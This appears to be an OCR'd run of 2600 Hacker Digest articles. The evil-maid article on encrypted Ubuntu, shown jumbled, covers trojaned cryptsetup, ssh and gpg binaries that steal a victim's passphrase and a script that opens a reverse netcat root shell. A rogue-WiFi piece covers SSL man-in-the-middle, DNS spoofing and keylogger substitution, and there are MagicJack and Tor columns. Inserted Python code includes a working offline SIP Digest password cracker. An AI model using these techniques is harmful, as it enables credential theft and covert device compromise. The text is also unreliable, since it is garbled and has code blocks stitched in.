To recompress initrd.” Right after that. live USB device.img file gets decompressed in memory. and does other startup stuff. Right before line 650 is this if statement: if((r = LUKS_open_any_key( ➥options->device. If you have multiple Linux kernels installed.5-2ubuntu12. } This basically means.

The evil ssh and gpg binaries also wrote passwords to this same dump file.0. taking the source code from the Ubuntu repository for programs he uses all the time (cryptsetup.img file and replace it. a new file will be saved in plaintext in /boot/. I keep it on my keyring. you can then write whatever you want to the root partition. Pretty cool. swap.img file. Install grub to the master boot record of your USB stick.d directories to make a couple things run on bootup. While installing Ubuntu. and install grub to it. It also wrote his encryption passphrase. only a lot stealthier. make a “physical volume for LVM. “but if the passphrase does work.cryptpass in this directory. After the init script finished executing. m0rebel@ubuntu:~/cryptsetup$ ➥ mkdir root m0rebel@ubuntu:~/cryptsetup$ dpkg ➥ -x cryptsetup_1.0.5$ sudo dpkg➥buildpackage m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. and a couple of other evil binaries to his root partition. and then make the rest a “physical volume for encryption”.img file. m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. so the defense is simply don’t keep any unencrypted files on your hard drive. If you don’t want to reinstall your operating system.cryptpass in the boot partition. only once).0. If you have access to the initrd. to see all the files it creates in the right directory structure. openssh.cryptpass. though. copy /boot/* to it. close the file.img back into his boot partition (so this attack wouldn’t happen every time he booted up.0. In order to
0x50 Self-Defense
0x40 Did Someone Say Rootkit?
. This whole attack relies on modifying unencrypted files on your hard drive. and Ubuntu began loading the rest of the way. you can not only put an evil cryptsetup binary in there.img file from their unencrypted boot partition. You have to make sure you keep a close watch on your USB stick. not the boot partition. but you can also change around the init script to make it evil. it ran my init scripts. I modified the init script to then copy his encryption passphrase. after you steal the encryption passphrase. and any other partitions you might want. you can format your USB stick.VOLUME 26
after cryptsetup unlocks the hard drive. /etc/passwd. When you get to the partitioner. keep a USB stick plugged into your computer. This way. One of the startup scripts moved the unpoisoned initrd. all they can do is stare at the encrypted data scratching their heads. Now all you need to do is get a copy of the victim’s initrd. and then recompress the initrd. and hackers much more talented than me in rootkit development probably know how to do the same thing. which spells 0wned. Inside there.0.” This will write the encryption passphrase in plaintext to a file called . copy root/initramfs-tools/scripts/* to initrd/ scripts/. then waited another 15 minutes and sent a reverse netcat root shell to me. huh? Most of the attack on my friend relied on this exact same technique.5$ make m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. I made cryptsetup write his encryption passphrase to the ramdisk.5-2ubuntu12_ ➥i386. create a new file called /mntboot/. a copy of the original.5$ cd . After compiling it. unpoisoned initrd.. gnupg) and modifying them to be evil. It then deleted itself and the files that made it run on boot up.deb root/ m0rebel@ubuntu:~/cryptsetup$ ls ➥ -l root/sbin/ total 56 -rwxr-xr-x 1 m0rebel ➥ m0rebel ➥ 52632 2008-10-20 18:01 ➥ cryptsetup m0rebel@ubuntu:~/cryptsetup$ And there you have it: an evil.d and /etc/rcX. It then added some files to his /etc/init. There are a million other ways to do it. You can then save the file and compile it. then create a new directory called /mntboot. and never leave it lying around. and unmount the partition. sent me the contents of the dump file over the internet./configure m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. do a manual partition. The next time the victim boots up and enters their passphrase. copy root/sbin/cryptsetup to initrd/sbin/cryptsetup. and /etc/shadow to a dump file.” and inside there put your root. This script was an infinite loop that waited 15 minutes. I like to build a debian package. 
The other startup script ran an evil Python script in the background. But it gets better. While pwning my good friend. not your internal hard drive. extract it. Make your USB stick hold /boot. if an attacker gets physical access to your computer. and after the init script mounts the encrypted partitions. write the encryption passphrase to it.5$ . then extract it. trojaned cryptsetup binary. mount the unencrypted boot partition to this new directory.
THE HACKER DIGEST . these startup scripts get run as root.} /* end evil code */ This basically says.
system(“/bin/umount /mntboot”). That’s just how I did it. Carry them with you on a USB stick instead. Keep in mind. This means that when the computer is booting up.

co. You should then be able to boot from your USB stick. but ignoring this attack isn’t worth it when you have real secrets to hide. In this article. but forms the downstream (network-side) connection to the PortaNet. An important thing to remember when doing this is that a lot of Ubuntu updates rewrite your initrd. A little annoying maybe. a general purpose PortaNet might be composed of the following: 1.. you might as well just not encrypt your hard drive. To try and keep this article to more readable proportions. Uplink: A device that forms the upstream (Internet-side) connection to the PortaNet. you can often see people scanning the airwaves in the hope of finding a free and open route to the Internet before they are forced to part with their hard-earned cash.uk)
If there is one truth in today’s ever connected world. GSM/GPRS data modem. charging users for their access.” you’ll find instructions on how to do that. the standard disclaimers apply to this educational article. But that’s stupid.1st file on that CD looks like:
default 0 timeout 2 title Boot from USB (hd1) root (hd1) chainloader +1
I can now boot to this CD with my USB stick in. and even on board long-distance trains. and you are the only one responsible for anything that you use the following information for. comment out the line that mounts /boot. this should ideally be a WiFi card/ dongle that’s capable of functioning in
0x00.VOLUME 26
install grub to it. If you need more information on a specific aspect of this article.img to load Ubuntu. most commonly kernel upgrades.
0x60 Conclusion
L33ching the L33chers:
Using a Portable Wireless Network
by DieselDragon (hyperspeed666@gmail. such as a WiFi card/dongle. For having phun in public places.dieseldragon. Although potential variants of a PortaNet may run into the thousands. I solved this pretty simply by making a grub boot CD that chainloaded to my USB device. or Ethernet link. However. and then run grub-install /dev/sdb (or wherever your USB stick is). I will explore some of the basic principles of Portable Networks and the possibilities that they open up for many interesting and useful activities. which will then boot the closely watched initrd. http://www. you’ll need to unmount /boot. but it works. It’s also a good idea to make regular backups of the files on this USB stick. such as “The Cloud” in London.THE HACKER DIGEST . a PortaNet is a complete network that exists in a portable and easily transportable form. Introduction
0x01. or if you value your privacy.com. One computer I tried setting this defense up on couldn’t boot from USB devices. every major railway station and airport.img. depending on what use they are intended for. I’m going to concentrate mainly on the theory behind Portable Networks and their uses. Obviously. All this may seem a little paranoid. or “PortaNets”
. Google is your friend! As one may imagine from the name. you’ll need these backups to boot your computer. remount it as your USB device. Downlink: As above. Public WiFi networks now exist in almost every restaurant. Portable Networks.. Make sure your USB stick is plugged in and mounted as /boot when doing these updates. If you google “Making a GRUB bootable CD-ROM. modify /etc/ fstab. It’s important to freedom. Here’s what the menu. Encrypt everything. and the CD will then boot from the USB stick. If you’re worried about a competent attacker (and government agents occasionally have their competent moments). 2. If you ever lose or break your USB stick. and burn them to CDs or keep them on the internet. with many of these public networks. it’s the fact that the general public loves free wireless Internet access.

Power source: Even with the most modern batteries and power-saving techniques. The departures lounge at Stansted is typical of most UK airports. 4. as it IS the user’s connection. As I said at the beginning of this article. a PortaNet will drink a lot of juice in general operation.THE HACKER DIGEST .com in response to any requests for paypal. you could set-up the DNS to return the IP for paypalsucks. Although probably a complicated and rather tricky thing to set-up. If you wanted to go the whole hog and fool those who may decide to double-check the network first.. you won’t find a cost-free route to the Internet in any departures lounge where pay-WiFi is available! It is in these situations where our PortaNet comes in.. For more overt applications. and he loves nothing better than to find a connection that appears to be running on default out-of-box settings. which could easily be a DNS run on our laptop. they’ll have their system set to obtain network info (IP address. could be done with the same approach. to a casual observer..) that may be needed. redirection to a spoofed login page for any website. This offers up a wide range of possibilities for what can be done with that traffic given that. might look like an old AP that’s simply been plugged in and long forgotten about. you could even spoof the MAC address of your downlink card and set up a web server with faked router config pages on the laptop! As being discreet is vital. just what exactly can a PortaNet be used for? The following are a number of interesting possible applications and. this would be a laptop. given the nature of computing. and it probably comes as no surprise to find that.9% of the time whenever a client connects to a network.com. We then set up the downlink card to form a separate. so having a convenient power outlet at hand is most advisable. the laptop could trap and encrypt/decrypt secure communications on-the-fly through the following process: 1. Therefore. Likewise. 
depending on the situation at hand. legit-looking URL. Aside from the typical eavesdropping exercises. Traffic and service re-routing 99. in such a case. on the laptop itself or elsewhere. Uses of a PortaNet
0x02. In practice.. Apache etc. open. and this allows us to specify which DNS server the client will use for hostname resolution. all communications between the two cards run across the laptop and it is here where our eavesdropping (or whatever) applications are being run. Server: A device used to connect the Uplink and Downlink together. setting the downlink card with a generic name like “linksys” or “belkin” will probably encourage more connections from unsuspecting users than the dangerously obvious “Free_WiFi”.VOLUME 26
Access Point (AP) mode. then establishes
0x03. Many people will often reach for their laptops whilst awaiting departure. On the other hand. So. Of course. and to host any applications (Such as Wireshark) or services (DNS. The laptop establishes a secure connection to the victim in response to their original request. something that I outline in clearer detail in 0x03. one of the two WiFi cards should ideally be an internal one. The victim requests a secure web page using their browser. we give ourselves a route to the Internet. any old AP or wired switch/ hub will do. 2.. no matter how much you scan the air. The main principle of a PortaNet is that all traffic from the inside of the network passes across the server (laptop) as it goes to and from the Internet.. with the additional benefit that the address bar in the victims browser would still display the original. DNS server address. Brief Scenario and Setup
.. Thousands of travellers pass through it every day en-route to various destinations. a PortaNet. If you dislike PayPal for example. and the captive audience of passengers awaiting their flights is a veritable gold-mine for the operators of pay-WiFi hotspots. and configured to our own ends. By purchasing an access code for the pay-WiFi network (or firing up Wireshark and grabbing someone else’s) and setting our uplink card to use that network. etc) via DHCP. A separate AP cunningly hidden under a jacket or baseball cap might also be fine though. as even the most uneducated of users might sense something odd about a laptop with two WiFi dongles poking out of it. it is also theoretically possible to change and/ or redirect content en-route. we have full control over the victim’s Internet connection. 3.. Joe Public loves to have free WiFi access. Eavesdropping on “secure” communications The problem with conventional “passive” eavesdropping is that encrypted communications like HTTPS are exactly what they say on the tin. this list is probably just the tip of the proverbial iceberg. and unsecured network that. preferably one with a decent amount of RAM and CPU power if anything more complex than general eavesdropping is planned. has the potential to record such transmissions in their original plain-text form.

THE HACKER DIGEST - VOLUME 26
3. a separate secure connection to the requested website.
4. Transmissions between the victim’s browser and site are decrypted by the laptop upon arrival, the plain-text is logged/recorded, then the data is re-encrypted for transmission to its intended destination via the second secure connection.

Obviously, for seamless operation and less chance of detection by the victim, you would also need to change (if necessary) and pass on any security certificates or other authentication tokens that the victim’s browser would normally use to check that the connection is indeed “secure”.

Content shaping and hi-jacking

As whatever goes to the victim’s browser has to pass through our laptop first, it is possible for us to change and generally mess about with whatever it is they are looking at. Simple changes for small profits could be the changing of all passing Google AdSense provider IDs to one of your own... meaning that you’d get credited with hits every time the victim clicks any AdSense ad. Other phun could be had in the swapping of Google’s logo with Yahoo’s and other little content injection/tampering jokes. On a more serious note, of course, the same technique could also be used to substitute a requested application with a keylogger or similar nasty program, or to completely reverse the meaning of an e-mail from the victim’s loved one.

Sharing the cost of Internet access

A group of 50 people (those at a 2600 meeting, perhaps) enter a bar and settle down with their laptops and PDAs, only to find that the one available AP has some ridiculous charge of £10 per connection, or something like that. By connecting the PortaNet’s upstream card as a single paid-for connection and routing it through the downstream card to everyone’s devices, each user pays only 20p towards the cost of the connection... and the gr33dy so-and-so’s running the AP only take £10 in total, instead of the £500 that they’d normally expect to make from such a large group.
Secure group communications over public WiFi

Following on from example D above, another headache with using public WLANs is that they generally have to be open and unsecured to allow users to connect to them in the first place... meaning that anything sent from the user’s device has to be encrypted before transmission, to remain secure from anyone else on the network who may be running an eavesdropping tool. Using a PortaNet, it would be possible for the laptop to route all Internet traffic passing across it via an SSH tunnel, or similar encrypted medium, to a server running elsewhere for onward transmission, which would bypass the risk normally posed by the public WLAN being used. Of course, one could normally do this from their own device anyway. But the added benefit of using a PortaNet to serve group communications in this way is that only one device (the PortaNet laptop) needs to be configured to use the SSH tunnel, and it affords protection for less skilled members of the group who may not know how to use such secured connections.

0x04. Other potential uses of a PortaNet

Back in November 2008CE, I stayed in an Oslo youth hostel that ran a free and open WiFi network for guest use, and a lot of people were using it for just about every possible activity. It naturally occurred to me that, assuming I was staying in a dorm within range of the AP, if I were to set up a laptop running Wireshark and simply leave it running in my locker or hidden under the bunk, then I could capture all manner of interesting traffic throughout the day without even having to be in the hostel. On top of this, a PortaNet could be configured to capture traffic passing across the network in the conventional way for storage and transmission to another device across a separate, secure connection. Aside from providing you with a secure, encrypted connection, as suggested in point E above, it would also allow you to perform eavesdropping/traffic monitoring from anywhere within range of the PortaNet’s AP card, meaning that you wouldn’t be confined to the power outlet in the dorm all the time.

0x05. Avoiding dodgy connections and networks

Obviously, this article clarifies just how insecure and potentially dangerous public WiFi networks can be for the unwary, so I will also give a few hints ‘n’ tips for checking and avoiding malicious PortaNets and similar setups:

Check the MAC address for the connection that you are using

If a network called “belkin” connects to an AP with a MAC address starting 00:07:0D, then you are actually connecting to a Cisco/LinkSys device of some description. If the manufacturer’s ID code (generally the first three bytes of the MAC) doesn’t match up with the brand of router that you seem to be connecting to, chances are that the network is a “fake”.
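A defender-side check for the MAC-address advice above, added here as an example and not part of DieselDragon’s article: it parses `iw dev <iface> scan` style output, compares the vendor implied by a default-looking SSID with the vendor registered for the BSSID’s OUI, and also flags locally-administered addresses, which are software-assigned and so consistent with a spoofed MAC. The OUI table is a small constructed excerpt (00:07:0D is the Cisco prefix quoted in the article; the rest should be checked against the IEEE registry) and the scan text is constructed sample data.

```python
import re

# Constructed excerpt of the IEEE OUI registry (first three octets -> vendor).
# 00:07:0D is the Cisco prefix cited in the article; the remaining entries are
# illustrative and should be checked against the full registry before use.
OUI_VENDOR = {
    "00:07:0D": "Cisco",
    "00:0C:41": "Cisco-Linksys",
    "00:11:50": "Belkin",
    "00:30:BD": "Belkin",
    "00:09:5B": "Netgear",
}

# Brand words found in factory-default SSIDs, mapped to the vendor strings
# (as used in OUI_VENDOR) that a genuine unit would carry.
SSID_BRANDS = {
    "linksys": ("Cisco", "Cisco-Linksys"),
    "belkin": ("Belkin",),
    "netgear": ("Netgear",),
}

BSS_RE = re.compile(r"^BSS ([0-9A-Fa-f:]{17})")
SSID_RE = re.compile(r"^\s+SSID: (.*)$")

def normalize_mac(mac):
    """Return MAC as upper-case XX:XX:XX:XX:XX:XX; accepts ':', '-' or '.'."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError("malformed MAC address: %r" % (mac,))
    digits = digits.upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))

def is_locally_administered(mac):
    """Bit 1 of the first octet set: the address was assigned in software
    (e.g. by whoever configured the AP), not burned in by the manufacturer."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)

def implied_brands(ssid):
    """Vendors a default-looking SSID claims to come from, or () if none."""
    lowered = ssid.lower()
    for word, vendors in SSID_BRANDS.items():
        if word in lowered:
            return vendors
    return ()

def assess_ap(ssid, bssid):
    """Apply the article's heuristic to one network; returns a verdict dict."""
    bssid = normalize_mac(bssid)
    prefix = bssid[:8]                      # the OUI
    vendor = OUI_VENDOR.get(prefix)
    brands = implied_brands(ssid)
    reasons = []
    if is_locally_administered(bssid):
        reasons.append("BSSID is locally administered (software-assigned, "
                       "consistent with a spoofed MAC)")
    if brands and vendor is not None and vendor not in brands:
        reasons.append("SSID suggests %s but OUI %s is registered to %s"
                       % ("/".join(brands), prefix, vendor))
    if reasons:
        verdict = "suspicious"
    elif brands and vendor in brands:
        verdict = "consistent"
    else:
        verdict = "unverified"              # no brand claim, or unknown OUI
    return {"ssid": ssid, "bssid": bssid, "vendor": vendor,
            "verdict": verdict, "reasons": reasons}

def parse_iw_scan(text):
    """Extract (ssid, bssid) pairs from `iw dev <iface> scan` style output."""
    pairs, bssid = [], None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:
            bssid = m.group(1)
            continue
        m = SSID_RE.match(line)
        if m and bssid is not None:
            pairs.append((m.group(1).strip(), bssid))
            bssid = None
    return pairs

def scan_report(text):
    """Assess every network in a scan dump; returns a list of verdict dicts."""
    return [assess_ap(ssid, bssid) for ssid, bssid in parse_iw_scan(text)]

# Constructed sample scan: "belkin" on the Cisco OUI from the article, a
# genuine-looking "belkin", and an open hotspot on a locally administered MAC.
SAMPLE_SCAN = """\
BSS 00:07:0d:12:34:56(on wlan0)
\tSSID: belkin
BSS 00:11:50:aa:bb:cc(on wlan0)
\tSSID: belkin
BSS 02:1a:2b:3c:4d:5e(on wlan0)
\tSSID: Free_WiFi
"""
```

`scan_report(SAMPLE_SCAN)` returns the verdicts suspicious, consistent and suspicious for the three constructed networks, in that order.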


Bear in mind, though, that MAC addresses can be spoofed and reconfigured by whoever has set up the device, so this isn’t a comprehensive safety measure. It should protect you from any PortaNets set up by average Skr1pt K1dd1ez though. A list of vendor MAC codes can be found via http://tinyurl.com/vendor-MACs

Encrypt as much of your traffic as possible, and use complicated/obscure/multi-layer methods of encryption

Although a PortaNet could potentially decrypt/re-encrypt data en-route as outlined above, a rare encryption protocol (or one that uses pre-defined keys and sends encrypted data right from the get-go) stands less chance of being known and decryptable by anyone running a PortaNet.

Don’t do anything risky in public!

The very nature of public WLANs means that they shouldn’t be used for accessing private and confidential services such as PayPal and online banking sites, unless you are using a strongly encrypted tunnel connection for such things. Remember that a lot of online services such as Hotmail, eBay and Facebook only use HTTPS encryption for user authentication purposes, and then drop back to normal HTTP for sending general data, including the content of private pages and e-mails. In these situations, even if your username and password are protected with HTTPS, the unencrypted data in the pages that you load afterwards could still provide a lot of ammunition for an identity thief or similar individual.

Consider using your own network services whenever possible

Setting up your own DNS and/or encrypted web-proxy on a machine at home, and only using those services, should afford a lot of protection from malicious DNS and similar attacks, with the added benefit that you have a greater level of control over the services that you may use whilst out and about.
With a normal public WiFi connection, you often have to put your trust in the DNS and other services provided by that network or the ISP serving the connection, and, while most commercial ISPs can generally be trusted to deliver legitimate responses to DNS and similar calls, it would be a very simple matter for the manager of a cafe to set up a maliciously configured DNS to route calls from customers’ laptops to only the gods know where.

0xFF. The final word

Here’s hoping that you all enjoyed this article on the theory and benefits of Portable Networks, the insecurity of public WLANs, and how to go about protecting yourself from the dangers posed by the above! I see that despite my original intentions, this article, like my previous ones, has run to somewhat epic proportions... but fingers crossed, this hasn’t proved too long or tiresome for people to read and enjoy. On a more personal note, I have unfortunately become rather badly hit by the recent “credit crunch”, and I’ve actually had to lose my home Internet connection as a result. Consequently, I’m now having to do all of my Internet access and e-mail from public libraries, which often doesn’t give me nearly enough time to do everything online that I need to. So, although comments and/or constructive critique on this article are more than welcome via e-mail, I’d like to ask people not to e-mail me with any in-depth questions about “How to do this...”, “How can I make that...” or similar, as I probably won’t have nearly enough time available to answer them. Farewell for now, have a lot of phun, and surf safe!

The Best of 2600: A Hacker Odyssey

The 600-page hardcover collection can be found at bookstores everywhere and at http://amazon.com/2600
The special “collector’s edition” is also available in rapidly dwindling numbers.


Telecom Informer
by The Prophet
Hello, and greetings from the Central Office! I’m currently over the North Pacific winging my way back to Seattle. I now know the price of tea in China, the breeding cycle of the giant panda, and just how crazy payphones can get. In fact, you may see some interesting Chinese payphone pictures in an upcoming issue of 2600. When preparing for my trip to Sichuan, one big consideration was how I’d call back home. Land lines are available and payphones are plentiful throughout China, but costs are very high using U.S.-based calling cards (anywhere from 50 cents to $1 per minute). Slightly more reasonable rates are available using Chinese GSM carriers, but rates still average 20-50 cents per minute. Meanwhile, VoIP is very cheap, weighing in with prices as low as... well, free. That’s what MagicJack advertises, which deserved a closer look. Of course, it’s not really free, but the promise is tempting: for about $40, you can simply plug in MagicJack and make calls anywhere in the U.S. or Canada for free. Call as long as you want, anywhere you want, for an entire year. Better yet, each subsequent year costs only $20. The product even includes free voice mail and you can select phone numbers in whatever market you like nationwide. And best of all, no fiddling around with headsets or microphones on a computer; just plug one end of the MagicJack into your computer’s USB port, and then connect the other end to an ordinary telephone set. Heck, it was even endorsed as the 2008 PC Magazine product of the year! What could possibly go wrong? Well, if you have to ask that in the telecommunications business - especially where VoIP is involved - you probably haven’t been around it for very long. VoIP is a very complicated business, and MagicJack fails to unravel its complexity. In fact, it introduces some complexity of its own. Phone numbers in whatever market you like? Well, you may get one in the same LATA, but the end office might be a toll call to virtually everywhere. 
Call anywhere you want? Sure, as long as the number isn’t blocked by MagicJack (as many Iowa-based teleconference services are). Make as many calls as you like? Yes, as long as you call fewer than 60 unique numbers per day. When you install the software, the End User License Agreement (EULA) has a few very nasty surprises. And as for that PC Magazine Product of the Year endorsement (which MagicJack still advertises), PC Magazine rescinded it - something never before done in the history of the magazine. There are four distinct components of MagicJack:

Hardware. This is made by TigerJet, a manufacturer of VoIP hardware. The TigerJet integrated chipset provides a USB audio controller, which serves as the interface between your telephone set and the computer. It also provides a CD-ROM USB device, which is used to install the MagicJack software.

Client software. Written by SJ Labs, this provides a SIP/RTP “soft phone.” It uses the CPU of your computer to encode and decode your conversations, and referencing an index of gateway servers, it uses your Internet connection to reach MagicJack’s SIP/RTP gateways. The software also logs your phone calls, sends information about you to Google, and serves advertising.

Middleware. Provided by stratus.com, this software runs on MagicJack gateway servers. These are numerous and located throughout the country with reasonable proximity to MagicJack rate centers. This software provides encoding and decoding of SIP/RTP conversations on the server side, and also provides an SS7 interface to the PSTN. SIP servers appear to run on Linux, and Asterisk appears to be the switching platform. RTP servers appear to run on OpenVMS for HP Alpha.

CLEC. MagicJack is a wholly owned subsidiary of YMAX Communications Inc., a fully qualified CLEC in all 50 states. This is the ace in MagicJack’s sleeve, and appears to make possible (albeit with razor-thin margins) unlimited calling to anywhere in the U.S. or Canada.
MagicJack software is available for both Mac and PC. I tested the PC version. Although this is supposed to be a “plug and play” installation experience, it doesn’t work if you have autoplay disabled in your operating system. To install the software, I had to hunt through the root directory of the virtual CD-ROM device (which contains a file called “DO NOT USE THIS DRIVE”) to find the setup files. Running the installer downloads the latest installation files from the MagicJack site and starts up the soft phone. This allows you to immediately make 30 minutes of calls (over a 48 hour period) prior to registration. After you’ve reached either threshold, registration is mandatory. In this “demo” state, 800, 888, 877, 866, 500, and 900 calls are blocked, as are international calls (except Canada) and calls to directory assistance. After registering, you can select a phone number. MagicJack then offers insurance for $1 per year. The insurance covers damage to or failure of your MagicJack hardware, but whether MagicJack replaces your hardware is in its sole discretion. I declined. After registering, I received two email messages. The first was a 911 disclosure. It basically says that MagicJack will try to connect 911 calls, but they’re under no obligation to do so and they will only send 911 whatever information you provided at sign-up (which may not be your actual location). I also received a verification email. Clicking on the verification email specifically allows MagicJack to spam you per their Terms of Service. Once installed, the softphone cannot be uninstalled. Yes, you read this correctly. Even if you return the MagicJack, the software will remain on your computer, tracking your activity and displaying ads forever (or until you track down and eradicate every piece of it). Once installed correctly, making phone calls is as


easy as picking up the phone and dialing. That is, as long as the ports the soft phone uses are open, and as long as it’s able to communicate with the MagicJack SIP and RTP servers. There are a few additional technical requirements that are unlikely to be met on many consumer PCs, leading to a complicated and frustrating troubleshooting experience with MagicJack’s unhelpful customer service (they communicate with you only via web chat, and generally provide canned answers that don’t apply to your problem). While running, the client software handles SIP/RTP in the background. The SIP credentials use a salted hash password, which means that it could be cracked via dictionary attack (this could allow you to, for example, clone your MagicJack account to a SIP ATA). The client also displays advertising and secretly sends information about you to Google via the 1e100.net domain. “Don’t be evil” indeed. The user interface allows selecting between normal broadband connections and high latency, slower speed aircard connections. Normal broadband connections appear to use the GSM codec, while aircard connections use a poorer quality (but lower bandwidth) codec. Obviously, as a phreak, I tested the entire dial plan. Here are my observations:

• Voice quality ranges between poor and terrible. Folks, for $20 a year, you get what you pay for! It’s too poor to pass DTMF in most cases. The quality is also too poor to maintain a data (such as fax or modem) connection, making for a frustrating experience sending faxes or calling dial-up BBSs.
• As compared to other VoIP services I tested, Skype, Gizmo5, IPKall, and Google Voice all provide a markedly superior VoIP experience. In my market, MagicJack quality is so poor that the service is virtually unusable.
• Disconnected numbers ring indefinitely and then go to reorder. No SIT tones and no recording, so it’s really difficult to know what went wrong.
• ANI and Caller ID do pass correctly.
• Either 10 or 11 digit dialing goes through, but seven digit dialing is not allowed.
• All circuits busy recordings are played.
• Calls to numbers that don’t supervise go through, and they even send forward audio.
• Calls to Canada and the U.S. are free, including Alaska, Hawaii and Puerto Rico. However, U.S. Virgin Islands isn’t considered domestic and isn’t allowed without purchasing international credits. Guam and the Commonwealth of the Northern Mariana Islands are also considered international.
• Calls to 800/888/866/877 numbers go through without issues. However, calls to UIFNs (country code 800) fail without any international calling credit. I’m not sure whether they go through or bill properly with international calling credit on the account, because I didn’t buy any.
• Calls to a carrier access code plus any number route to a recording that says “You have reached a YMAX Communications test number. This call was successful.”
• Dialing 0 provides instructions to dial the area code and telephone number. 0+ calls yield the same results.
• While most calls appear to be routed either through local access tandems or dedicated interconnection trunks, YMAX doesn’t have interconnection agreements with every ILEC, CLEC, or wireless carrier. For these calls, AT&T appears to be the long distance carrier (based on all circuits busy recordings). The trunk used is 062T, which is the New York 24 tandem.
• Call waiting works correctly. There is no three-way calling available on outbound calls. A three-way calling feature for inbound calls is available, but I couldn’t get it to work.
• Voice mail is available, and is surprisingly rich and full featured. The terms of YMAX’s interconnection agreements require a reasonable degree of traffic parity for the “bill and keep” arrangements made, so YMAX definitely wants you to receive calls.
• Call forwarding is available via the MagicJack website. You can log in to set up forwarding.
• *67 doesn’t work, and there’s no apparent way to block Caller ID (either per-call or permanently).

Unless MagicJack is a giant Ponzi scheme, how could they possibly afford to provide unlimited calling for only $20 per year? This is something I really wanted to find out, given the spectacular collapse of previous VoIP services priced well below market. What I discovered is that $20 per year may become the new market price for voice service. MagicJack is a subsidiary of YMAX Communications Inc., a fully qualified CLEC with a management team consisting of numerous telecommunications industry veterans. These folks knew what they were doing, and played their cards very shrewdly when setting up the company. In reviewing the interconnection agreements filed between YMAX and AT&T for its 13-state region (handled by tminc.com), the billing arrangement is consistently “bill and keep” and is not subject to access charges (a topic I’ve written extensively about in previous columns). There is one exception, which is ISP-bound traffic. This is subject to a .0007 cent charge per minute of use, where activity exceeds a 3:1 terminating to originating ratio. This is clearly why MagicJack provides such full-featured voicemail; they need to maintain at least this balance of inbound to outbound calls in order for their business model to work. In fact, it is possible (though unlikely) under this arrangement for YMAX to receive reciprocal compensation from AT&T for inbound calls to MagicJack lines while terminating calls for free to AT&T’s network. In many states, it’s difficult to obtain access to tariffs without paying. However, I was able to review a Qwest tariff for Montana and a Verizon tariff for Illinois containing similar terms, so it’s reasonable to believe that YMAX has pursued a consistent strategy with respect to interconnection. While the underlying carrier (YMAX) is a CLEC, MagicJack is specifically not offered as a CLEC product.
The terms of service explicitly state that MagicJack is “...a multimedia experience which includes a voice over Internet information service feature. It is not a telecommunications service and is subject to different regulatory treatment from telecommunications services.” This appears to exempt MagicJack from essentially any regulation from either the FCC or local public utility commissions. It’s time to bring this column to a close. Have a safe winter… and if you make it to China, enjoy the Harbin ice sculptures, try some delicious Uighur cuisine, and don’t miss the pandas! Shout outs to: Chronomex, afiler, javantea, maokh, inf0reaper, Dan Kaminsky, and the Metrix Create:Space crew.
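The dictionary attack the column mentions against the softphone's SIP credentials works because SIP registers with HTTP Digest authentication (RFC 3261 section 22, RFC 2617): the server's nonce is the "salt", and the client's response is an MD5 over the password, realm, nonce and request URI. Anyone who captures one REGISTER challenge and its answer can test password guesses offline. The following is an added example, not code from the column or from MagicJack; the username, realm, nonce, URI and wordlist are constructed sample values, and the "captured" header is built by running the legitimate client-side computation with a known password so the attack can be checked end to end.

```python
"""Offline dictionary attack on a captured SIP Digest challenge/response (added example)."""
import hashlib
import re


def _md5(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """MD5 Digest response: RFC 2069 style when qop is absent (common in SIP stacks),
    RFC 2617 style when qop=auth. HA1 is what a server stores; HA2 covers method:uri."""
    ha1 = _md5("%s:%s:%s" % (username, realm, password))
    ha2 = _md5("%s:%s" % (method, uri))
    if qop == "auth":
        return _md5(":".join([ha1, nonce, nc, cnonce, qop, ha2]))
    return _md5("%s:%s:%s" % (ha1, nonce, ha2))


def parse_digest(header):
    """Parse the key=value pairs of an 'Authorization: Digest ...' header into a dict."""
    _, _, params = header.partition("Digest")
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)\s*=\s*("[^"]*"|[^,\s]+)', params)}


def crack_digest(header, method, wordlist):
    """Return the first password in wordlist that reproduces the captured response, else None."""
    p = parse_digest(header)
    for guess in wordlist:
        calc = digest_response(p["username"], p["realm"], guess, method, p["uri"], p["nonce"],
                               p.get("qop"), p.get("nc"), p.get("cnonce"))
        if calc == p["response"]:
            return guess
    return None


# Constructed sample capture: the client registered with the (weak) password "summer09".
USER, REALM, NONCE = "15551234567", "sip.example.net", "5d1c8f3ab2e4c9017f"
URI, METHOD = "sip:sip.example.net", "REGISTER"
CAPTURED_HEADER = ('Authorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", '
                   'response="%s", algorithm=MD5'
                   % (USER, REALM, NONCE, URI,
                      digest_response(USER, REALM, "summer09", METHOD, URI, NONCE)))
WORDLIST = ["password", "123456", "magicjack", "summer09", "letmein"]   # constructed

if __name__ == "__main__":
    print(crack_digest(CAPTURED_HEADER, METHOD, WORDLIST))
```

Without qop the attack needs nothing but the one captured header, and with qop=auth it needs only the nc and cnonce values that are in the same header, so the nonce slows nothing down; it just prevents precomputation. The only real defences are a password that is not in any wordlist and carrying SIP over TLS so the exchange cannot be captured in the first place.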


by iphelix
0. Introduction

This guide will show you how to enhance (or completely break) your privacy on the intertubes by delving into Tor's internals. You will learn how to create custom circuits of any size, monitor every aspect of Tor activity, and other really cool hacks. The key to all of this is Tor's embedded control protocol, which gives you a lot more control over Tor's operations compared to the standard "push-the-big-red-button" GUI interfaces.

First things first, you must enable the Tor control port by editing /etc/tor/torrc. Uncomment the ControlPort line:

## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
ControlPort 9051

HINT: You can quickly enable the control port by passing --controlport 9051 when executing Tor from the command line.

With the control port open, we can now connect to the Tor server:

$ telnet localhost 9051

Once connected, we need to authenticate (the password hash is "" by default):

authenticate ""
250 OK

